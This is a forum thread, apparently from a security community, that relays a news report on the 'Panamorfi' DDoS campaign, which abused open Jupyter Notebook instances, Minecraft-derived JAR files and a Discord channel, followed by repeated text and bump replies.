OP 18 August, 2024 - 07:57 PM
(This post was last modified: 18 August, 2024 - 10:47 PM by DragonCave.)
AquaSec experts have uncovered a new DDoS attack campaign dubbed "Panamorfi," which leverages the popular platforms Minecraft and Discord to execute its malicious activities. The campaign uses a Java-based package called "mineping.jar," originally developed for Minecraft servers, to carry out DDoS attacks such as TCP flood.
The attack sequence begins by exploiting open instances of Jupyter Notebook on the internet. Attackers execute wget commands to download a ZIP archive from the Filebin site. This archive contains two JAR files: "conn.jar" and "mineping.jar." The "conn.jar" file establishes connections to a Discord channel, from which it directly triggers the execution of the "mineping.jar" package.
According to Aqua researcher Assaf Morag, the purpose of these attacks is to overwhelm the target server's resources by sending a large number of TCP connection requests. The results of the attack are then displayed in a dedicated Discord channel, allowing the attackers to monitor their impact.
This malicious campaign is attributed to an attacker operating under the pseudonym "yawixooo," whose GitHub account contains a public repository with a Minecraft server configuration file.
This isn't the first time open instances of Jupyter Notebook have been targeted for attacks. In October 2023, Cado Security experts identified the Qubitstrike campaign, organized by a Tunisian group, which attempted to exploit Jupyter Notebook for illegal cryptocurrency mining and cloud environment hacking.
Researchers warn that attacks on Jupyter Notebook are becoming increasingly frequent and sophisticated. IT professionals must pay close attention to the configuration and security of these tools to prevent similar incidents in the future.
This is a bump
The attack sequence begins by exploiting open instances of Jupyter Notebook on the internet. Attackers execute wget commands to download a ZIP archive from the Filebin site. This archive contains two JAR files: "conn.jar" and "mineping.jar." The "conn.jar" file establishes connections to a Discord channel, from which it directly triggers the execution of the "mineping.jar" package.
According to Aqua researcher Assaf Morag, the purpose of these attacks is to overwhelm the target server's resources by sending a large number of TCP connection requests. The results of the attack are then displayed in a dedicated Discord channel, allowing the attackers to monitor their impact.
This malicious campaign is attributed to an attacker operating under the pseudonym "yawixooo," whose GitHub account contains a public repository with a Minecraft server configuration file.
This isn't the first time open instances of Jupyter Notebook have been targeted for attacks. In October 2023, Cado Security experts identified the Qubitstrike campaign, organized by a Tunisian group, which attempted to exploit Jupyter Notebook for illegal cryptocurrency mining and cloud environment hacking.
Researchers warn that attacks on Jupyter Notebook are becoming increasingly frequent and sophisticated. IT professionals must pay close attention to the configuration and security of these tools to prevent similar incidents in the future.
This is a bump
![[Image: SoLRf.gif]](https://external-content.duckduckgo.com/iu/?u=https%3A%2F%2Fs12.gifyu.com%2Fimages%2FSoLRf.gif)
bump !